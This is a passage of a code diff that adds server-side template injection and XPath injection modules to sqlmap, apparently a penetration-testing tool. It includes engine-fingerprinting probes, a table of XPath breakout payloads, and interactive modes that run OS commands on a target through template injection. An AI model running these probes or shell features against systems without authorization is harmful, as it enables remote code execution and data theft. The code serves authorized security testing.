+    return None
+
+
+# A divide-by-zero error is language-family specific, which separates engines that SHARE a
+# delimiter but run on different runtimes (Jinja2/Python vs Twig/PHP in '{{ }}', or Mako/Python
+# vs Freemarker/Spring/Java in '${ }'). Matching is case-SENSITIVE so Python's lowercase
+# 'division by zero' is not confused with PHP's capitalised 'Division by zero'. JS is omitted on
+# purpose: 1/0 yields Infinity there rather than an error, so it carries no family signal.
+# Entries are (family, compiled regex) pairs; _probeFamily() returns the family of the FIRST
+# entry whose regex matches, so the order below is significant.
+_FAMILY_DIVZERO = (
+    ("python", re.compile(r"division by zero")),
+    ("ruby", re.compile(r"divided by 0")),
+    ("php", re.compile(r"DivisionByZeroError|Division by zero")),
+    ("java", re.compile(r"ArithmeticException|/ by zero")),
+)
+
+
+def _probeFamily(place, parameter, engine, cache):
+    """Evaluate 1/0 inside the engine's delimiters and map the resulting error message to a
+    backend language family. Returns that family, or None when the engine has no arithmetic
+    format or closing delimiter, the request gave no page, the payload came back verbatim, or
+    no known message matched. `cache` maps payload -> response and is filled in place, so
+    engines sharing a delimiter reuse one request."""
+
+    if not (engine.arithmeticFmt and engine.delimiterClose):
+        return None
+
+    base = _originalValue(place, parameter) or ""
+    payload = base + engine.delimiter + "1/0" + engine.delimiterClose
+
+    try:
+        page = cache[payload]
+    except KeyError:
+        page = cache[payload] = _send(place, parameter, payload)
+
+    if not page:
+        return None
+
+    text = getUnicode(page)
+    if payload in text:
+        # echoed back unchanged: the template never evaluated it
+        return None
+
+    return next((family for family, regex in _FAMILY_DIVZERO if regex.search(text)), None)
+
+
+def _probeDistinguishing(place, parameter, engine):
+    """Send the engine-specific fingerprint probe and verify the response.
+    For probes with a non-empty expected result, the result must appear and the
+    raw probe must NOT be reflected verbatim.
+    For empty-result (comment-style) probes, the response must stay similar to
+    baseline and the probe must NOT appear in the output.
+    Returns True when the probe confirms the engine; False otherwise, including when the
+    engine has no probe or a request yields no page."""
+
+    if not engine.distinguishingProbe:
+        return False
+
+    original = _originalValue(place, parameter) or ""
+    probe = engine.distinguishingProbe
+    page = _send(place, parameter, original + probe)
+    if not page:
+        # _send() reports a failed request as "" (never None). Letting "" through would make
+        # the empty-result branch below compare two empty pages (ratio 1.0) and count a
+        # network failure as positive evidence.
+        return False
+
+    text = getUnicode(page)
+
+    # Reject raw reflection: if the probe appears verbatim, the template didn't execute it
+    if probe in text:
+        return False
+
+    if engine.distinguishingResult:
+        return engine.distinguishingResult in text
+
+    # Empty-result (comment-style) probe: response must stay similar to baseline
+    baseline = _send(place, parameter, original)
+    if not baseline:
+        # no usable baseline to compare against
+        return False
+    return _ratio(page, baseline) >= UPPER_RATIO_BOUND
+
+
+def _detectBoolean(place, parameter, engine):
+    """Try to establish a true/false oracle with the engine's boolean payloads.
+    Returns the reproducible true page handed back by _boolean(), or None."""
+    base = _originalValue(place, parameter) or ""
+    onPayload = base + engine.booleanTrue
+    offPayload = base + engine.booleanFalse
+
+    def _fetchTrue():
+        return _send(place, parameter, onPayload)
+
+    def _fetchFalse():
+        return _send(place, parameter, offPayload)
+
+    if engine.trueRendered:
+        onPage = _fetchTrue()
+        if not onPage:
+            return None
+
+        # the expected rendering must be present and the payload must not be echoed verbatim
+        onText = getUnicode(onPage)
+        evaluated = engine.trueRendered in onText and onPayload not in onText
+        if not evaluated:
+            return None
+
+        # Reject reflected false payload
+        offPage = _fetchFalse()
+        if offPage and offPayload in getUnicode(offPage):
+            return None
+
+    return _boolean(_fetchTrue, _fetchFalse)
+
+
+def _booleanUniquelyIdentifies(engine):
+    """Tell whether exactly one engine among those sharing this engine's opening delimiter
+    has its combination of boolean payloads and renderings, so a boolean hit names it exactly."""
+
+    def _signature(candidate):
+        return (candidate.booleanTrue, candidate.booleanFalse,
+                candidate.trueRendered, candidate.falseRendered)
+
+    wanted = _signature(engine)
+    matches = [candidate for candidate in _ENGINE_TABLE
+               if candidate.delimiter == engine.delimiter and _signature(candidate) == wanted]
+    return len(matches) == 1
+
+
+def _familyUniquelyIdentifies(engine):
+    """Tell whether exactly one engine among those sharing this engine's opening delimiter
+    runs on its language family, in which case the divide-by-zero family probe names it exactly."""
+    sameRuntime = 0
+    for candidate in _ENGINE_TABLE:
+        if candidate.delimiter == engine.delimiter and candidate.family == engine.family:
+            sameRuntime += 1
+    return sameRuntime == 1
+
+
+def _fingerprint(place, parameter):
+    """Identify the template engine and confirm injection. Returns (engine, evidence)
+    where evidence is a dict of detection results, or (None, None).
+
+    Scoring: arithmetic(3) + boolean(2) + error(1) + distinguishing(2) + family(1).
+    Engines sharing delimiters require error, distinguishing, unique boolean rendering, or a
+    uniquely-identifying language family to be named exactly; otherwise they are reported as
+    family/probable."""
+
+    bestEngine = None
+    bestEvidence = None
+    bestScore = 0
+    # payload -> response cache shared by all engines for the divide-by-zero probe
+    divZeroCache = {}
+
+    # every engine of the table is probed; there is no early exit on a strong match
+    for engine in _ENGINE_TABLE:
+        evidence = {}
+        score = 0
+
+        # Phase 1: Arithmetic in-band proof with control pair (strongest)
+        if _probeArithmetic(place, parameter, engine):
+            evidence["arithmetic"] = True
+            score += 3
+
+        # Phase 2: Boolean oracle
+        if _detectBoolean(place, parameter, engine):
+            evidence["boolean"] = True
+            score += 2
+
+        # Phase 3: Error-based fingerprinting
+        errorPage = _probeError(place, parameter, engine)
+        if errorPage is not None:
+            # re-checks the page returned by _probeError() against the same engine regex
+            if _isError(errorPage, engine):
+                evidence["error"] = True
+                score += 1
+
+        # Phase 4: Distinguishing probe (breaks ties within delimiter families)
+        if _probeDistinguishing(place, parameter, engine):
+            evidence["distinguishing"] = True
+            score += 2
+
+        # Phase 5: language-family confirmation via divide-by-zero error class
+        if _probeFamily(place, parameter, engine, divZeroCache) == engine.family:
+            evidence["family"] = True
+            score += 1
+
+        # strict '>' : on equal scores the engine listed earlier in the table is kept
+        if score > bestScore:
+            bestScore = score
+            bestEngine = engine
+            bestEvidence = evidence
+
+    # a score of 3 is the minimum to report a finding from the scored phases
+    if bestEngine and bestScore >= 3:
+        # For engines with ambiguous delimiters (shared by multiple engines),
+        # name a specific engine when there is an error fingerprint, a distinguishing probe
+        # hit, a boolean rendering unique within the delimiter family, or a language family
+        # unique within the delimiter family.
+        _FAMILY = {
+            "{{": "Jinja2/Twig/Handlebars-like",
+            "${": "Freemarker/SpringEL/Mako-like",
+        }
+        if bestEngine.delimiter in _FAMILY:
+            if (bestEvidence.get("error") or
+                    bestEvidence.get("distinguishing") or
+                    (bestEvidence.get("boolean") and _booleanUniquelyIdentifies(bestEngine)) or
+                    (bestEvidence.get("family") and _familyUniquelyIdentifies(bestEngine))):
+                pass  # specific engine name stands
+            else:
+                # only the display name changes; every other field of the engine is kept
+                bestEngine = bestEngine._replace(
+                    name="%s (probable %s)" % (_FAMILY[bestEngine.delimiter], bestEngine.name))
+        return bestEngine, bestEvidence
+
+    # Fallback: generic error detection
+    # (append each bare opening delimiter and stop at the first response that matches one of
+    # the SSTI_ERROR_SIGNATURES entries)
+    errorBackend = None
+    for suffix in ("{{", "${", "<%=", "#{"):
+        page = _send(place, parameter, _originalValue(place, parameter) + suffix)
+        if page:
+            backend = _backendFromError(page)
+            if backend:
+                errorBackend = backend
+                break
+
+    if errorBackend:
+        # map the signature name back to a table entry: the engine name must be a
+        # case-insensitive substring of it; a signature matching no engine reports nothing
+        for engine in _ENGINE_TABLE:
+            if engine.name.lower() in errorBackend.lower():
+                return engine, {"error": True}
+
+    return None, None
+
+
+def sstiScan():
+ """Entry point for '--ssti'. Fingerprints every candidate parameter with _fingerprint(),
+ reports each hit, then runs the requested follow-up actions (--ssti-query, --ssti-shell,
+ --os-cmd, --os-shell) against the first vulnerable parameter only. Returns None."""
+ global SENTINEL
+ # Rebind the module-level sentinel so every scan works with a fresh random token
+ SENTINEL = randomStr(length=10, lowercase=True)
+
+ debugMsg = "'--ssti' is self-contained: it detects SSTI and fingerprints "
+ debugMsg += "common template engines when possible. SQL enumeration "
+ debugMsg += "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored"
+ logger.debug(debugMsg)
+
+ if not conf.paramDict:
+ logger.error("no request parameters to test (use --data, GET params, or similar)")
+ return
+
+ tested = 0
+ # Each entry is (place, parameter, engine, evidence)
+ found = []
+
+ # Only places listed in SSTI_PLACES that actually occur in the request are scanned
+ for place in (_ for _ in SSTI_PLACES if _ in conf.paramDict):
+ for parameter in list(conf.paramDict[place].keys()):
+ # Honour an explicit parameter selection when one was given
+ if conf.testParameter and parameter not in conf.testParameter:
+ continue
+
+ tested += 1
+ logger.info("testing SSTI on %s parameter '%s'" % (place, parameter))
+
+ engine, evidence = _fingerprint(place, parameter)
+ if engine:
+ found.append((place, parameter, engine, evidence))
+ logger.info("%s parameter '%s' is vulnerable to SSTI (back-end: '%s')" % (place, parameter, engine.name))
+ if conf.beep:
+ beep()
+
+ # Payload shown in the report: the 7/7 arithmetic probe when the engine has an
+ # arithmetic format, otherwise the engine's boolean-true probe
+ if engine.arithmeticFmt:
+ payload = _originalValue(place, parameter) + _arithmeticPayload(engine.arithmeticFmt, 7, 7)
+ else:
+ payload = _originalValue(place, parameter) + engine.booleanTrue
+ title = "SSTI %s injection" % engine.name
+ report = "---\nParameter: %s (%s)\n Type: SSTI\n Title: %s\n Payload: %s=%s\n---" % (parameter, place, title, parameter, payload)
+ conf.dumper.singleString(report)
+
+ if evidence.get("arithmetic"):
+ logger.info("in-band arithmetic proof confirmed (control-pair)")
+ if evidence.get("boolean"):
+ logger.info("boolean oracle confirmed")
+
+ if not found:
+ if tested:
+ warnMsg = "no parameter appears to be injectable via SSTI (%d tested)" % tested
+ else:
+ warnMsg = "no parameters found to test for SSTI"
+ logger.warning(warnMsg)
+ else:
+ # Summarise the distinct engine names seen across all findings
+ engines = set(engine.name for _, _, engine, _ in found)
+ if len(engines) == 1:
+ logger.info("back-end template engine: '%s'" % engines.pop())
+ else:
+ logger.info("back-end template engines: %s" % ", ".join(sorted(engines)))
+
+ if found:
+ # All follow-up actions below target the first finding only
+ slot = found[0]
+ place, parameter, engine, evidence = slot
+ from lib.core.common import readInput
+
+ wantsTakeover = any(conf.get(_) for _ in ("osCmd", "osShell", "sstiQuery", "sstiShell"))
+
+ # If the user did not ask for exploitation, confirm (benignly) whether OS command
+ # execution is reachable and, if so, advise the relevant switches.
+ if not wantsTakeover and _canTakeover(engine, evidence) and _probeRce(place, parameter, engine):
+ logger.info("the back-end '%s' allows OS command execution via this injection; "
+ "you are advised to try '--os-shell' (interactive) or "
+ "'--os-cmd=' (single command)" % engine.name)
+
+ # --ssti-query: user-provided expression evaluated in-band
+ if conf.get("sstiQuery"):
+ _evalExpression(place, parameter, engine, conf.sstiQuery)
+
+ # --ssti-shell: interactive expression evaluation loop (interactive even under --batch,
+ # like sqlmap's SQL --sql-shell/--os-shell, which read straight from the terminal)
+ if conf.get("sstiShell"):
+ logger.info("calling SSTI shell. Enter expressions (e.g. 7*7) or 'exit'/'quit' to leave")
+ while True:
+ expr = readInput("ssti-shell> ", checkBatch=False)
+ # Empty input as well as 'exit'/'quit' ends the loop
+ if not expr or expr.strip().lower() in ("exit", "quit"):
+ break
+ _evalExpression(place, parameter, engine, expr.strip())
+
+ # --os-cmd / --os-shell: RCE via SSTI (reuses existing SQL takeover flags)
+ if conf.get("osCmd") or conf.get("osShell"):
+ if not _canTakeover(engine, evidence):
+ logger.error("takeover requires exact engine fingerprint (got '%s') and "
+ "confirmed proof (arithmetic or boolean oracle)" % engine.name)
+ else:
+ # The single command (if any) runs before the interactive shell is entered
+ if conf.get("osCmd"):
+ _executeCommand(place, parameter, engine, conf.osCmd)
+
+ # Interactive shell runs even under --batch (mirrors the SQL --os-shell, which
+ # reads commands straight from the terminal); EOF / 'exit' / 'quit' leaves it.
+ if conf.get("osShell"):
+ logger.info("calling SSTI OS shell. Enter commands or 'exit'/'quit' to leave")
+ while True:
+ cmd = readInput("os-shell> ", checkBatch=False)
+ if not cmd or cmd.strip().lower() in ("exit", "quit"):
+ break
+ _executeCommand(place, parameter, engine, cmd.strip())
+
+ logger.info("SSTI scan complete")
+
+
+def _escapeSingleQuoted(value):
+    """Return `value` with backslashes doubled and single quotes backslash-escaped, so it
+    can be embedded in a single-quoted string literal."""
+    # Backslashes must go first; otherwise those introduced for the quotes get doubled too
+    escaped = value.replace("\\", "\\\\")
+    escaped = escaped.replace("'", "\\'")
+    return escaped
+
+
+def _evalExpression(place, parameter, engine, expr):
+    """Evaluate a user-supplied template expression in-band and print its result.
+
+    The expression is sent between two random markers, each rendered through the engine's
+    expression format, and the text between the rendered markers is taken as the result.
+    When the markers cannot be located in that order (or enclose nothing), the text that
+    differs from a baseline response is used instead.
+
+    place, parameter -- injection point
+    engine           -- fingerprinted engine; needs a non-empty `expressionFmt`
+    expr             -- expression to evaluate (e.g. 7*7)
+
+    Returns None; the result is written via conf.dumper, failures are logged."""
+
+    if not engine.expressionFmt:
+        logger.error("expression evaluation not supported for engine '%s'" % engine.name)
+        return
+
+    original = _originalValue(place, parameter) or ""
+    startMarker = randomStr(length=8, lowercase=True)
+    endMarker = randomStr(length=8, lowercase=True)
+
+    # Three-part payload: marker, expression, marker -- each in its own template tag
+    # so the expression is evaluated independently of the markers
+    payload = original + _expressionPayload(engine.expressionFmt, "'%s'" % startMarker)
+    payload += " " + _expressionPayload(engine.expressionFmt, expr)
+    payload += " " + _expressionPayload(engine.expressionFmt, "'%s'" % endMarker)
+    page = _send(place, parameter, payload)
+
+    if not page:
+        logger.warning("no response for SSTI expression '%s'" % expr)
+        return
+
+    text = getUnicode(page)
+    result = None
+
+    # Extract content between the random markers. find() is used instead of index() so
+    # that an end marker occurring only *before* the start marker falls through to the
+    # baseline diff below rather than raising ValueError.
+    start = text.find(startMarker)
+    if start != -1:
+        start += len(startMarker)
+        end = text.find(endMarker, start)
+        if end != -1:
+            result = text[start:end].strip()
+
+    # Fallback: diff against baseline
+    if not result:
+        baseline = _send(place, parameter, original)
+        if baseline:
+            matcher = difflib.SequenceMatcher(None, getUnicode(baseline), text)
+            parts = [text[j1:j2] for tag, _i1, _i2, j1, j2 in matcher.get_opcodes() if tag in ("insert", "replace")]
+            if parts:
+                result = "".join(parts).strip()
+
+    if result:
+        conf.dumper.singleString("SSTI expression result: %s" % result)
+    else:
+        logger.warning("could not extract expression result from response")
+
+
+def _canTakeover(engine, evidence):
+    """Tell whether OS command execution may be attempted: the engine must ship RCE
+    payloads, its name must be an exact fingerprint (no "(probable" / "-like" family
+    guess), and the evidence must contain an arithmetic or boolean proof."""
+    # Short-circuit evaluation keeps the original check order
+    return bool(engine.rcePayloads
+                and "(probable" not in engine.name
+                and "-like" not in engine.name
+                and (evidence.get("arithmetic") or evidence.get("boolean")))
+
+
+def _probeRce(place, parameter, engine):
+    """Benign, quiet RCE-capability check: run `echo <marker>` through each of the engine's
+    RCE payloads and return True as soon as the marker shows up as command output. Used
+    only to advise the user; it has no side effect beyond echoing a random token.
+
+    A response counts as proof only if it is not a template error page and the marker is
+    present outside a literal copy of the submitted `echo <marker>` command. A page that
+    merely reflects (or quotes in an error message) the payload therefore does not produce
+    a false "command execution reachable" advice.
+
+    Returns False when the engine has no RCE payloads or none of them yields the marker."""
+
+    if not engine.rcePayloads:
+        return False
+
+    marker = randomStr(length=12, lowercase=True)
+    command = "echo %s" % marker
+    original = _originalValue(place, parameter) or ""
+
+    for payloadTemplate, _description in engine.rcePayloads:
+        page = _send(place, parameter, original + payloadTemplate.replace("{CMD}", command))
+        if not page:
+            continue
+
+        # Same guard as in _executeCommand(): a template exception is not command output
+        if engine.errorRegex and _isError(page, engine):
+            continue
+
+        # Drop literal reflections of the command before looking for the marker
+        if marker in getUnicode(page).replace(command, ""):
+            return True
+
+    return False
+
+
+def _executeCommand(place, parameter, engine, cmd):
+ """Execute an OS command via the engine's RCE payloads, trying each fallback
+ in order until one produces output. Captures output via baseline diff.
+
+ The first payload whose response yields usable output is printed through conf.dumper
+ and ends the function; if none does, a warning is logged. Returns None."""
+
+ # The command is escaped for a single-quoted context before it replaces {CMD}
+ # (presumably the payload templates embed {CMD} inside single quotes -- verify against the engine table)
+ safeCmd = _escapeSingleQuoted(cmd)
+ original = _originalValue(place, parameter) or ""
+ # Response for the unmodified value; used below to isolate what the command added
+ baseline = _send(place, parameter, original)
+
+ for payloadTemplate, description in engine.rcePayloads:
+ payload = payloadTemplate.replace("{CMD}", safeCmd)
+ fullPayload = original + payload
+ page = _send(place, parameter, fullPayload)
+
+ if not page:
+ continue
+
+ # Skip error pages (payload caused a template exception, not a shell)
+ if engine.errorRegex and _isError(page, engine):
+ continue
+
+ text = getUnicode(page)
+ baseText = getUnicode(baseline or "")
+ output = ""
+
+ # Preferred extraction: everything inserted or replaced relative to the baseline
+ if baseText and text != baseText:
+ sm = difflib.SequenceMatcher(None, baseText, text)
+ opcodes = sm.get_opcodes()
+ parts = []
+ for tag, i1, i2, j1, j2 in opcodes:
+ if tag in ("insert", "replace"):
+ parts.append(text[j1:j2])
+ if parts:
+ output = "".join(parts).strip()
+
+ # Fallback: the whole page, minus a leading copy of the original value
+ if not output:
+ output = text
+ if original and output.startswith(original):
+ output = output[len(original):]
+ output = output.strip()
+
+ # Report only output that is sufficiently different from the baseline (ratio below
+ # UPPER_RATIO_BOUND), is not the baseline itself, and is not the baseline with the
+ # original value removed (i.e. the command produced no output of its own)
+ if output and _ratio(output, baseText) < UPPER_RATIO_BOUND:
+ if output != baseText.strip() and not (baseText and baseText.replace(original, "").strip() == output):
+ conf.dumper.singleString("\nos-shell (%s) [%s]:\n%s" % (cmd, description, output))
+ return
+
+ logger.warning("no output received for OS command '%s' (tried %d payload(s))" % (cmd, len(engine.rcePayloads)))
diff --git a/lib/techniques/xpath/__init__.py b/lib/techniques/xpath/__init__.py
new file mode 100644
index 0000000000..bcac841631
--- /dev/null
+++ b/lib/techniques/xpath/__init__.py
@@ -0,0 +1,8 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
+See the file 'LICENSE' for copying permission
+"""
+
+pass
diff --git a/lib/techniques/xpath/inject.py b/lib/techniques/xpath/inject.py
new file mode 100644
index 0000000000..bd40548be9
--- /dev/null
+++ b/lib/techniques/xpath/inject.py
@@ -0,0 +1,687 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
+See the file 'LICENSE' for copying permission
+"""
+
+import difflib
+import re
+import time
+
+from collections import namedtuple
+
+from lib.core.common import beep
+from lib.core.common import randomStr
+from lib.core.convert import getUnicode
+from lib.core.data import conf
+from lib.core.data import logger
+from lib.core.enums import CUSTOM_LOGGING
+from lib.core.enums import PLACE
+from lib.core.settings import UPPER_RATIO_BOUND
+from lib.core.settings import XPATH_CHAR_MAX
+from lib.core.settings import XPATH_CHAR_MIN
+from lib.core.settings import XPATH_ERROR_REGEX
+from lib.core.settings import XPATH_ERROR_SIGNATURES
+from lib.core.settings import XPATH_MAX_DEPTH
+from lib.core.settings import XPATH_MAX_LENGTH
+from lib.request.connect import Connect as Request
+from lib.utils.xrange import xrange
+
+
+SENTINEL = randomStr(length=10, lowercase=True)
+
+XPATH_PLACES = (PLACE.GET, PLACE.POST, PLACE.CUSTOM_POST)
+
+# Each detection breakout is paired with a false variant and an (optional) extraction
+# boundary. The boundary carries a prefix/suffix pair that wraps the extraction
+# predicate so the surrounding template stays syntactically valid.
+#
+# Breakouts are listed in detection-priority order: function-argument closers first,
+# then simple string, double-quoted, union wildcard, and bare numeric/boolean.
+
+_BREAKOUT_TABLE = (
+ # (breakout, false_variant, extraction_prefix, extraction_suffix )
+ # -- function-argument (closes paren + string) ------------------------------------------------------------
+ ("') or true() or ('", "') and false() and ('", "') or ", " or ('"),
+ ("') or '1'='1' or ('", "') and '1'='2' and ('", "') or ", " or ('"),
+ ("') or 1=1 or ('", "') and 1=2 and ('", "') or ", " or ('"),
+ # -- single-quoted string (suffix absorbs trailing quote; predicate decisive when original value unmatched)
+ ("' or '1'='1", "' and '1'='2", "' or ", " and '1'='1"),
+ ("' or true() or '", "' and false() and '", "' or ", " and '1'='1"),
+ ("' or 1=1 or '", "' and 1=2 and '", "' or ", " and '1'='1"),
+ # -- AND context (single-quoted) -------------------------------------------------------------------------
+ ("' and '1'='1", "' and '1'='2", "' and ", " and '1'='1"),
+ # -- double-quoted string (suffix absorbs trailing quote) -------------------------------------------------
+ ('" or "1"="1', '" and "1"="2', '" or ', ' and "1"="1'),
+ ('" or true() or "', '" and false() and "', '" or ', ' and "1"="1'),
+ # -- double-quoted function-argument ---------------------------------------------------------------------
+ ('") or true() or ("', '") and false() and ("', '") or ', ' or ("'),
+ # -- union wildcard (detection-only, no extraction) ------------------------------------------------------
+ ("']|//*|test['", None, None, None),
+ # -- numeric / bare context (extraction uses 'and'; requires the original value to match) -------------------
+ (" or 1=1", " and 1=2", " and ", ""),
+ (" or true()", " and false()", " and ", ""),
+)
+
+# Boundary: a verified injection boundary with an extraction prefix+suffix and an
+# extractable flag. Only extractable boundaries can drive tree-walking.
+Boundary = namedtuple("Boundary", ("prefix", "suffix", "extractable"))
+
+# Convenience lookups built from _BREAKOUT_TABLE
+# _BREAKOUT_FALSE_MAP: breakout -> false variant (None when the table row has none)
+# _BREAKOUT_BOUNDARY:  breakout -> Boundary(prefix, suffix, True), or None when the row has no extraction prefix
+# _BREAKOUT_LIST:      breakouts in table order (i.e. detection-priority order)
+_BREAKOUT_FALSE_MAP = {}
+_BREAKOUT_BOUNDARY = {}
+_BREAKOUT_LIST = []
+for _entry in _BREAKOUT_TABLE:
+ _bk, _fv, _pfx, _sfx = _entry
+ _BREAKOUT_LIST.append(_bk)
+ _BREAKOUT_FALSE_MAP[_bk] = _fv
+ if _pfx is not None:
+ _BREAKOUT_BOUNDARY[_bk] = Boundary(_pfx, _sfx, True)
+ else:
+ _BREAKOUT_BOUNDARY[_bk] = None
+XPATH_BREAKOUT_PREFIXES = tuple(_BREAKOUT_LIST)
+
+# Slot: one confirmed injection point together with everything needed to exploit it
+Slot = namedtuple("Slot", ("place", "parameter", "backend", "oracle", "template", "payload", "boundary"))
+# Every Slot field defaults to None, so slots can be built from keyword subsets
+Slot.__new__.__defaults__ = (None, None, None, None, None, None, None)
+
+
+def _ratio(first, second):
+    """Similarity of two pages in [0, 1] as given by difflib's quick_ratio(); falsy
+    inputs (None, "") are compared as empty strings."""
+    matcher = difflib.SequenceMatcher(None, first or "", second or "")
+    return matcher.quick_ratio()
+
+
+def _delim(place):
+    """Return the separator between parameters for `place`: the configured cookie
+    delimiter (';' when unset) for cookies, '&' everywhere else."""
+    if place == PLACE.COOKIE:
+        return conf.cookieDel or ';'
+    return '&'
+
+
+def _confParameters(place):
+    """Return the raw parameter string stored in conf.parameters for `place`, or ""
+    when there is none."""
+    try:
+        raw = conf.parameters.get(place, "")
+    except AttributeError:
+        # Container without a usable .get(): fall back to membership test + indexing
+        raw = ""
+        if place in conf.parameters:
+            raw = conf.parameters[place]
+    return raw
+
+
+def _originalValue(place, parameter):
+    """Return the value currently carried by `parameter` at `place`.
+
+    The raw parameter string is searched first (first segment whose name, stripped of
+    whitespace, equals `parameter`); conf.paramDict is the fallback. Returns "" when the
+    parameter cannot be found or its fallback value is empty."""
+    raw = _confParameters(place)
+    for chunk in raw.split(_delim(place)):
+        key, _separator, rawValue = chunk.partition('=')
+        if key.strip() != parameter:
+            continue
+        return rawValue
+
+    known = conf.paramDict.get(place, {})
+    return known.get(parameter) or ""
+
+
+def _replaceSegment(place, parameter, value):
+    """Return the parameter string for `place` with `parameter` set to `value`.
+
+    Only the first matching segment of the raw parameter string is rewritten; all other
+    segments are kept verbatim. When no segment matches, the string is rebuilt from
+    conf.paramDict instead."""
+    separator = _delim(place)
+    pieces = []
+    done = False
+
+    for piece in _confParameters(place).split(separator):
+        key = piece.partition('=')[0]
+        if done or key.strip() != parameter:
+            pieces.append(piece)
+            continue
+        # The name is written back exactly as found (surrounding whitespace included)
+        pieces.append("%s=%s" % (key, value))
+        done = True
+
+    if not done:
+        pieces = ["%s=%s" % (key, value if key == parameter else current)
+                  for key, current in conf.paramDict.get(place, {}).items()]
+
+    return separator.join(pieces)
+
+
+def _send(place, parameter, value):
+ """Issue a single HTTP request with the target parameter set to `value`.
+ Temporarily mutates conf.parameters so sqlmap's normal request machinery
+ (URL construction, cookies, headers, encodings) is fully preserved.
+
+ Returns the response page, or "" when the page is empty or the request raised
+ (the exception is logged at debug level); None is never returned."""
+
+ # Honour the configured delay before every probe
+ if conf.delay:
+ time.sleep(conf.delay)
+
+ # Remember the current parameter string so it can be put back afterwards.
+ # NOTE(review): if `place` was absent, the finally block leaves an "" entry behind
+ old_params = conf.parameters.get(place, "")
+ conf.parameters[place] = _replaceSegment(place, parameter, value)
+
+ try:
+ kwargs = {"raise404": False, "silent": True}
+ if conf.verbose >= 3:
+ logger.log(CUSTOM_LOGGING.PAYLOAD, "%s=%s" % (parameter, value))
+ page, _, _ = Request.getPage(**kwargs)
+ return page or ""
+ except Exception as ex:
+ # Best-effort probe: a failed request is reported as an empty page
+ logger.debug("XPath probe request failed: %s" % getUnicode(ex))
+ return ""
+ finally:
+ # Always restore the original parameter string, even when the request raised
+ conf.parameters[place] = old_params
+
+
+def _isError(page):
+    """True when `page` (None is treated as "") matches XPATH_ERROR_REGEX."""
+    text = getUnicode(page or "")
+    return re.search(XPATH_ERROR_REGEX, text) is not None
+
+
+def _backendFromError(page):
+    """Map an error page to a back-end name: the first entry of XPATH_ERROR_SIGNATURES
+    whose regex matches, "Generic XPath" for an unattributed XPath error, else None."""
+    text = getUnicode(page or "")
+
+    for backend, pattern in XPATH_ERROR_SIGNATURES:
+        if re.search(pattern, text):
+            return backend
+
+    if _isError(text):
+        return "Generic XPath"
+    return None
+
+
+def _probeBackendByParserError(place, parameter):
+    """Probe for XPath parser errors to obtain a backend hint.
+    This is NOT authoritative detection -- only a boolean oracle confirms injection.
+
+    Syntax-breaking suffixes are appended to the original value (or "x" when it is empty);
+    the first response that differs from the baseline and carries an XPath error signature
+    wins.
+
+    Returns (backend, payload), or (None, None) when no suffix triggers such an error or
+    the baseline itself is empty or already an error page."""
+
+    original = _originalValue(place, parameter) or "x"
+    normal = _send(place, parameter, original)
+
+    # Both conditions are loop-invariant and rule out every suffix, so bail out before
+    # spending six requests that could never produce a hint
+    if not normal or _isError(normal):
+        return None, None
+
+    for suffix in ("'", '"', "')", '")', "]", "|"):
+        payload = original + suffix
+        broken = _send(place, parameter, payload)
+
+        # Page did not change: the suffix was not interpreted
+        if _ratio(normal, broken) >= UPPER_RATIO_BOUND:
+            continue
+
+        backend = _backendFromError(broken)
+        if backend:
+            return backend, payload
+
+    return None, None
+
+
+def _boolean(truthy, falsy):
+    """Return the true page when the true and false probes are each reproducible and
+    differ from one another; otherwise None.
+
+    `truthy` and `falsy` are zero-argument callables issuing the respective request. Each
+    is called at most twice, true probe first; an error page or a non-reproducible
+    response aborts immediately."""
+
+    stable = []
+    for probe in (truthy, falsy):
+        first = probe()
+        if first is None or _isError(first):
+            return None
+
+        # Second shot of the same probe must look like the first one
+        second = probe()
+        if _ratio(first, second) < UPPER_RATIO_BOUND:
+            return None
+
+        stable.append(first)
+
+    truePage, falsePage = stable
+    if _ratio(truePage, falsePage) < UPPER_RATIO_BOUND:
+        return truePage
+    return None
+
+
+def _makePayload(original, boundary, predicate):
+    """Build `original + boundary.prefix + predicate + boundary.suffix`; a falsy suffix
+    (None or "") contributes nothing."""
+    tail = boundary.suffix if boundary.suffix else ""
+    return "%s%s%s%s" % (original, boundary.prefix, predicate, tail)
+
+
+def _detectBoolean(place, parameter):
+    """Return (template, payload, boundary) for boolean-blind XPath injection, or
+    (None, None, None) when no probe pair yields a reproducible true/false split.
+
+    `template` is the reproducible true page, `payload` the value that produced it and
+    `boundary` the extraction boundary tied to the winning breakout. `boundary` is None
+    for detection-only probes (union wildcard, bare '*')."""
+
+    original = _originalValue(place, parameter) or ""
+
+    for breakout in XPATH_BREAKOUT_PREFIXES:
+        falseVariant = _BREAKOUT_FALSE_MAP.get(breakout)
+        if not falseVariant:
+            # Detection-only entries (the union wildcard) carry no tabled false variant and
+            # used to be skipped altogether. Derive one by swapping the '*' node test for a
+            # random element name: quoting stays identical to the true payload, but the
+            # injected union branch should no longer select anything.
+            if "*" not in breakout:
+                continue
+            falseVariant = breakout.replace("*", SENTINEL)
+
+        truePayload = original + breakout
+        falsePayload = original + falseVariant
+        template = _boolean(lambda p=truePayload: _send(place, parameter, p),
+                            lambda p=falsePayload: _send(place, parameter, p))
+        if template:
+            return template, truePayload, _BREAKOUT_BOUNDARY.get(breakout)
+
+    # Wildcard: only useful for bool differentiation, not enumeration
+    if original:
+        template = _boolean(lambda: _send(place, parameter, "*"),
+                            lambda: _send(place, parameter, SENTINEL))
+        if template:
+            return template, "*", None
+
+    return None, None, None
+
+
+def _isPasswordParam(parameter):
+    """Heuristic: True when the lower-cased parameter name contains a credential-like
+    fragment (substring match, so e.g. "keyword" also qualifies)."""
+    lowered = getUnicode(parameter or "").lower()
+    for hint in ("pass", "pwd", "secret", "pin", "cred", "key", "token", "auth"):
+        if hint in lowered:
+            return True
+    return False
+
+
+def _fingerprintByError(backend):
+    """Normalise a backend hint: return the first XPATH_ERROR_SIGNATURES name contained
+    in `backend`, `backend` itself when none is, or None for a falsy hint."""
+    if backend:
+        for known, _regex in XPATH_ERROR_SIGNATURES:
+            if known in backend:
+                return known
+        return backend
+    return None
+
+
+def _xpathQuote(s):
+    """Render `s` as an XPath string literal. XPath literals have no escape mechanism, so
+    the delimiter not occurring in `s` is used; when both quote characters occur, the
+    value is assembled with concat()."""
+
+    s = getUnicode(s)
